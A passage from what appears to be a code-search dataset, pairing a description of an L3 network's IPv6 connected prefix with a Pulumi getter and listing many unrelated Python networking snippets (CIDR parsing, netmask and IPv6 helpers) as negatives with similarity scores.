"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def test_IPv4s_to_valid_CIDR(self):\n self.assertEqual(\n helpers.IPRange_to_valid_CIDR('192.168.0.1', '192.168.0.1'),\n '192.168.0.1/32'\n )",
"def to_network_v4(zone: Zone) -> ipaddress.IPv4Network:\n\n labels = zone.name.split(\".\")[:-3]\n netmask: int = 8 * len(labels)\n offset = 4 - len(labels)\n\n pattern = r\"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)([/-](2[5-9]|3[0-1]))?$\"\n last_label_parsed = re.search(pattern, labels[0])\n if not last_label_parsed:\n raise ValueError(\"Faild to parse the zone name\")\n\n if last_label_parsed[2]:\n # non-octet boundary delegation detected\n # remove netmask and save it to the result\n last_octect = last_label_parsed[1]\n labels[0] = last_octect\n netmask = int(last_label_parsed[2][1:])\n\n labels = [\"0\"] * offset + labels\n prefix_str = \".\".join(reversed(labels))\n prefix_str += f\"/{netmask}\"\n\n return ipaddress.IPv4Network(prefix_str, strict=True)",
"def customer_owned_ipv4_pool(self) -> str:\n return pulumi.get(self, \"customer_owned_ipv4_pool\")",
"def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:\n return pulumi.get(self, \"public_ip_prefixes\")",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def get_ip4_adresses(self):\n self._search_regx(self.PATTERN_IP4)\n return self._ip_adresses",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def cidr_block(self):\n return self._cidr_block",
"def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ip4range(iprange):\n assert not ('/' in iprange and '-' in iprange),'cidr and dash notation is not possible'\n if '/' in iprange:\n #cidr range\n ippart,mask=iprange.split('/',1)\n mask=int(mask)\n ip=ip_pad(ippart)\n lowerlong,upperlong=cidr2lowerupper(ip,mask)\n lowerip=long2ip(lowerlong)\n upperip=long2ip(upperlong)\n \n elif '-' in iprange:\n lpart,upart=iprange.split('-',1)\n lowerip=ip_pad(lpart)\n \n #upperip only one octet? fill last specified octed from lpart\n if '.' not in upart:\n sp=lpart.split('.')\n sp[-1]=upart\n upart='.'.join(sp)\n \n upperip=ip_pad(upart,True)\n else:\n lowerip=ip_pad(iprange)\n upperip=ip_pad(iprange,True)\n \n return lowerip,upperip",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)",
"def _validate_network_prefix(self):\n try:\n cidr = netaddr.IPNetwork(self.network + \"/\" + str(self.prefix))\n except netaddr.core.AddrFormatError:\n raise ValueError(_(\"Invalid IP address and prefix\"))\n address = netaddr.IPAddress(self.network)\n if address != cidr.network:\n raise ValueError(_(\"Invalid IP network %(address)s/%(prefix)s \"\n \"expecting %(network)s/%(prefix)s\") %\n {'address': self.network,\n 'prefix': self.prefix,\n 'network': cidr.network})",
"def get_main_ipv4():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect( ('8.8.8.8', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv4 address: %s\" % e)\n return None",
"def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def isIpv4AddrWithNetmask(string):\n return (True)",
"def get_min_addr(self):\n\n out = None\n for segment in self.segments:\n if out is None or segment.min_addr < out:\n out = segment.min_addr\n\n if out is None:\n for section in self.sections:\n if out is None or section.min_addr < out:\n out = section.min_addr\n\n if out is None:\n return self.rebase_addr\n else:\n return out + self.rebase_addr",
"def get_dns_name_prefix(self) -> Union[str, None]:\n return self._get_dns_name_prefix(enable_validation=True)",
"def ip(self):\n if not self._ip:\n if 'ip' in self.config:\n ip = self.config['ip']\n else:\n ip = self.protocol.transport.get_extra_info('sockname')[0]\n ip = ip_address(ip)\n if ip.version == 4:\n self._ip = ip\n else: # pragma: no cover\n response = urlopen('http://ipv4.icanhazip.com/')\n ip = response.read().strip().decode()\n ip = ip_address(ip)\n self._ip = ip\n return self._ip",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def encode_ipv4(self, input):\n return inet_aton(input)",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def find_ipv4():\n try:\n r = requests.get(v4_url)\n tree = html.fromstring(r.content)\n result = tree.xpath('//body/text()')\n result = result[0].split()\n ipv4 = result[len(result)-1]\n except:\n if cfg['debug']:\n print(\"Couldn't connect to %s\" % v4_url)\n print(\"Check that you have a valid IPv4 default route\")\n ipv4 = None\n\n return ipv4",
"def tunnel1_inside_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def isofy_ipv4(ip_string, prefix=\"\"):\n ipaddress.IPv4Address(ip_string) # fails for invalid IP\n\n if prefix != \"\":\n prefix_valid = bool(re.match(r\"^.{2}(\\..{4})*?$\", prefix))\n if not prefix_valid:\n raise ValueError(f\"{prefix} cannot be used as ISO prefix, please check formatting\")\n prefix += \".\"\n # IP: split and fill with 0s\n ip_parts = ip_string.split(\".\")\n padded = [p.zfill(3) for p in ip_parts]\n joined = \"\".join(padded)\n # IP: split to chunks à 4 chars\n chunksize = 4\n ip_chunks = [joined[i : i + chunksize] for i in range(0, len(joined), chunksize)]\n # combine\n iso_address = prefix + \".\".join(ip_chunks) + \".00\"\n return iso_address",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def source_cidr_block(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def min_addr(self):\n return self.vaddr",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def get_node_ip(self, prefix_db: openr_types.PrefixDatabase) -> Any:\n\n # First look for LOOPBACK prefix\n for prefix_entry in prefix_db.prefixEntries:\n if prefix_entry.type == network_types.PrefixType.LOOPBACK:\n return ipnetwork.sprint_addr(prefix_entry.prefix.prefixAddress.addr)\n\n # Else return None\n return None",
"def address_space_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def address_to_ip_prefix(address):\n return address.split('/')",
"def source_cidr_block(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def uuid_prefix(self) -> str:\n return str(self.uuid)[:-4]",
"def test_IPv4_to_CIDR(self):\n match_list = '1.2.3.0/29'\n self.assertEqual(helpers.IPRange_to_CIDR('1.2.3.1', '1.2.3.6'), match_list)",
"def get_network(address: str, netmask: str) -> IPv4Network:\n net = IPv4Network(f\"{address}/{netmask}\", strict=False)\n return net",
"def ipv4_addresses(self) -> Dict[str, List[IPv4Address]]:\n log.debug(\"Host %s: ipv4 addresses of the devices interfaces %s.\", self.host, self._get_ipv4_addresses(\"self\"))\n return self._get_ipv4_addresses(\"self\")",
"def transit_router_cidr_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"transit_router_cidr_id\")",
"def ipv4_enabled(self) -> bool:\n return pulumi.get(self, \"ipv4_enabled\")",
"def cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr_block\")",
"def address_space_prefixes(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def source_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"source_cidr_block\")",
"def address(self):\n return f'Address = {self._peer.address}/{self._peer.subnet.prefixlen}'"
] | [
"0.74853224",
"0.73985845",
"0.73985845",
"0.72560716",
"0.72186995",
"0.68104565",
"0.68104565",
"0.6797192",
"0.66854614",
"0.6672047",
"0.65196866",
"0.6441253",
"0.64102024",
"0.64046043",
"0.6388265",
"0.6357316",
"0.63264906",
"0.63264906",
"0.63264906",
"0.6296035",
"0.6267834",
"0.6267834",
"0.62537485",
"0.6236046",
"0.6205779",
"0.62007993",
"0.62001145",
"0.61688733",
"0.61575806",
"0.61488265",
"0.61063373",
"0.60362965",
"0.60362965",
"0.60032237",
"0.5989894",
"0.5910071",
"0.5910071",
"0.5891082",
"0.58376473",
"0.583705",
"0.58317065",
"0.58317065",
"0.5797725",
"0.5797725",
"0.57586324",
"0.5756452",
"0.5753612",
"0.57517356",
"0.5697386",
"0.5689427",
"0.5688877",
"0.56671184",
"0.5658577",
"0.5633485",
"0.5608565",
"0.5606508",
"0.56031954",
"0.5563074",
"0.5525189",
"0.5516327",
"0.5484276",
"0.54725695",
"0.54685086",
"0.5463351",
"0.54633313",
"0.54579604",
"0.54561466",
"0.54401886",
"0.53892183",
"0.5369914",
"0.5367008",
"0.53639764",
"0.53639764",
"0.5360987",
"0.53511745",
"0.5346809",
"0.5315047",
"0.5309648",
"0.5303447",
"0.5299599",
"0.5299599",
"0.5296356",
"0.5290755",
"0.5284695",
"0.52762604",
"0.52696246",
"0.5265343",
"0.52636945",
"0.5260749",
"0.52598155",
"0.5259148",
"0.5256177",
"0.52449846",
"0.5243726",
"0.5241658",
"0.52311844",
"0.52180994",
"0.52114046",
"0.52112955",
"0.5207764"
] | 0.72907937 | 3 |
The IPV6 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV6 or DualStack. | def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "ipv6_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ipv6_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def ipv6_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def remote_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_cidr_block_association_id(self) -> str:\n return pulumi.get(self, \"ipv6_cidr_block_association_id\")",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def toV6(self):\n return V6Address.fromV4(self)",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def GlobalIpv6Address(self):\n if self.force_auto_sync:\n self.get('GlobalIpv6Address')\n return self._GlobalIpv6Address",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> str:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6Flag(self):\r\n\t\treturn self._get_attribute('ipv6Flag')",
"def Ipv6Srh(self):\r\n\t\treturn self._get_attribute('ipv6Srh')",
"def ipv6_gateway_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def ipv6_networks(view):\n return \"ipv6network?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def LinkLocalIpv6Address(self):\n if self.force_auto_sync:\n self.get('LinkLocalIpv6Address')\n return self._LinkLocalIpv6Address",
"def ipv6_gateway_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def get_ipv6_zone_connection(self):\n return self.m_connection.ipv6_zones",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6rate(self):\n\t\treturn self._get_attribute('ipv6rate')",
"def ipv6_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def get_ipv6_list():\n ipv6 = __grains__.get(\"ipv6\")\n\n return \" \".join([\"[\" + ip + \"]\" for ip in ipv6])",
"def get_main_ipv6():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n s.connect( ('2001:4860:4860::8888', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv6 address: %s\" % e)\n return None",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def to_network_v6(zone: Zone) -> ipaddress.IPv6Network:\n\n labels = zone.name.split(\".\")[:-3]\n\n zone_reverse_str = \"\".join(reversed(labels))\n if len(zone_reverse_str) % 4 != 0:\n for _ in range(4 - (len(zone_reverse_str) % 4)):\n zone_reverse_str += \"0\"\n prefix_str = \":\".join(\n [zone_reverse_str[i : i + 4] for i in range(0, len(zone_reverse_str), 4)]\n )\n prefix_str += f\"::/{len(labels) * 4}\"\n\n return ipaddress.IPv6Network(prefix_str, strict=True)",
"def ipv6_bandwidth(self):\n return self._ipv6_bandwidth",
"def _get_virtual_oper_VipV6_address(self):\n return self.__virtual_oper_VipV6_address",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def sc_subnet(self):\n return self._sc_subnet",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def ipv6_to_ipv4(ipv6_str):\n return '.'.join([str(b) for b in ipv6_str[12:]])",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def get_if_raw_addr6(iff):\n ip6 = get_if_addr6(iff)\n if ip6 is not None:\n return inet_pton(socket.AF_INET6, ip6)\n\n return None",
"def get_global_ip_ipv6():\n network_info_providers = [\n 'http://v6.ipv6-test.com/api/myip.php',\n 'http://v6.ident.me/',\n ]\n random.shuffle(network_info_providers)\n for url in network_info_providers:\n try:\n return requests.get(url).text.lstrip().rstrip()\n except Exception:\n continue\n else:\n log.info('cannot find global ipv6 ip')\n return \"\"",
"def get_intf_address(self, intf, pod, v6=False):\n if v6:\n cmd = [\"ifconfig \" + intf + \" | grep Global\"]\n output = pod.run_cmd_on_vm(cmd)\n ip6 = re.search(\n r'inet6\\s+addr\\s*:\\s*(\\S*)',\n output['ifconfig eth0 | grep Global'])\n ip6_addr = ip6.group(1)\n return ip6_addr\n cmd = [\"ifconfig \" + intf + \" | grep inet\"]\n output = pod.run_cmd_on_vm(cmd)\n ip = re.search(\n r'inet\\s+addr\\s*:\\s*(\\d+.\\d+.\\d+.\\d+)',\n output['ifconfig eth0 | grep inet'])\n ip_addr = ip.group(1)\n return ip_addr",
"def ipv6_addresses(self) -> Dict[str, List[IPv6Address]]:\n log.debug(\"Host %s: ipv6 addresses of the devices interfaces %s.\", self.host, self._get_ipv6_addresses(\"self\"))\n return self._get_ipv6_addresses(\"self\")",
"def test_ipv6_in_net(self):\n test_ip = ip_address.IPAddress(\"2001:0db8:85a3:08d3:1319:8a2e:0370:7344/24\")\n assert test_ip.in_network(\"2001:0d00::/24\")\n assert test_ip.in_network(\"2001:0d00::/29\")",
"def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"associate_ipv6_address\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def ipv6_addresses(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def ipv6_networkcontainers(view):\n return \"ipv6networkcontainer?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def c6(self):\n return self._c6",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def SupportsIPv6(self) -> bool:",
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def _FixIPv6Address(self, netblocks):\n new_list = []\n length = len(netblocks)\n if length > 0:\n number_ipv6 = 0\n for netblock in netblocks:\n if netblock.version == 4:\n new_list.append(netblock)\n elif netblock.version == 6:\n number_ipv6 += 1\n if number_ipv6 == length:\n return True, new_list\n return False, new_list",
"def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def NumberOfMappingIPV6Ranges(self):\r\n\t\treturn self._get_attribute('numberOfMappingIPV6Ranges')",
"def get_rug_address():\n net = netaddr.IPNetwork(ULA_PREFIX)\n return str(netaddr.IPAddress(net.first + 1))",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def enable_ipv6(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_ipv6\")",
"def get_management_address(self, ensure_configuration=False):\n primary = self.get_interface(GENERIC_IFNAME + '0')\n prefix, prefix_len = ULA_PREFIX.split('/', 1)\n eui = netaddr.EUI(primary.lladdr)\n ip_str = str(eui.ipv6_link_local()).replace('fe80::', prefix[:-1])\n\n if not primary.is_up:\n self.up(primary)\n\n ip = netaddr.IPNetwork('%s/%s' % (ip_str, prefix_len))\n if ensure_configuration and ip not in primary.addresses:\n primary.addresses.append(ip)\n self.update_interface(primary)\n return ip_str",
"def ipv6(self, ipv6):\n\n self._ipv6 = ipv6",
"def assign_ipv6_address_on_creation(self) -> bool:\n return pulumi.get(self, \"assign_ipv6_address_on_creation\")",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def ipv4_to_ipv6(v6_network: Union[str, ipaddress.IPv6Network], v4_address: Union[str, ipaddress.IPv4Interface]):\n if isinstance(v6_network, str):\n v6_network = ipaddress.IPv6Network(v6_network)\n if isinstance(v4_address, str):\n v4_address = ipaddress.IPv4Address(v4_address)\n\n v6_address = v6_network[int(v4_address)]\n return ipaddress.IPv6Interface(f\"{v6_address}/{v6_network.prefixlen}\")",
"def ipv6_cmd(args):\n r = requete(\"Devices:get\")\n for i in r['status']:\n a = \"-\"\n if 'IPv6Address' in i:\n for j in i['IPv6Address']:\n if j['Scope'] != 'link':\n a = j['Address']\n b = \"-\"\n if 'IPAddress' in i: b = i['IPAddress']\n if a == \"-\": continue\n print(\"%4s %-32s %-5s %-16s %s\" % (i['Index'], i['Name'], i['Active'], b, a))",
"def OSSupportsIPv6(self) -> bool:",
"def ipv4(self):\n return Network(private=True).ipv4",
"def local_address(self) -> T_SockAddr:\n from anyio._core._sockets import convert_ipv6_sockaddr\n return convert_ipv6_sockaddr(self.raw_socket.getsockname())",
"def get_netmask(self):\n return self.get_ip_network().netmask",
"def is_net_ip6(value):\n for test in [lambda x: ipaddress.IPv6Network(x)._prefixlen != 128,\n lambda x: ipaddress.IPv6Interface(x)._prefixlen != 128]:\n try:\n return bool(test(value))\n\n except:\n pass\n\n return False",
"def filter_netmask(prefix):\n try:\n prefix_str = unicode(prefix)\n except NameError as ex:\n prefix_str = str(prefix)\n return IPv4Network(\"1.0.0.0/\"+prefix_str).netmask",
"def get_appgw_subnet_cidr(self) -> Union[str, None]:\n # determine the value of constants\n addon_consts = self.get_addon_consts()\n CONST_INGRESS_APPGW_ADDON_NAME = addon_consts.get(\"CONST_INGRESS_APPGW_ADDON_NAME\")\n CONST_INGRESS_APPGW_SUBNET_CIDR = addon_consts.get(\"CONST_INGRESS_APPGW_SUBNET_CIDR\")\n\n # read the original value passed by the command\n appgw_subnet_cidr = self.raw_param.get(\"appgw_subnet_cidr\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.addon_profiles and\n CONST_INGRESS_APPGW_ADDON_NAME in self.mc.addon_profiles and\n self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR) is not None\n ):\n appgw_subnet_cidr = self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR)\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return appgw_subnet_cidr",
"def name(self):\n return 'Destination Options for IPv6'",
"def __init__(self, address, netmask=None):\n\n if netmask:\n ip = Ipv6Address(address)\n address = \"%s/%s\" % (ip,netmask)\n\n google.ipaddr.IPv6Network.__init__(self, address, strict=False)",
"def ip6_cidr_range(ingress, debug=False):\n if debug:\n print('ip6_cidr_range ' + str(ingress) + lineno())\n print('type: ' + str(type(ingress)) + lineno())\n if hasattr(ingress, '__dict__'):\n print('vars: ' + str(vars(ingress)) + lineno())\n\n suffix = \"/128\";\n\n if type(ingress) == type(dict()):\n\n if debug:\n print('ingress is a dict: ' + lineno())\n\n if 'CidrIp' in ingress:\n\n if debug:\n print('CiderIp in ingress '+lineno())\n\n if type(ingress['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and 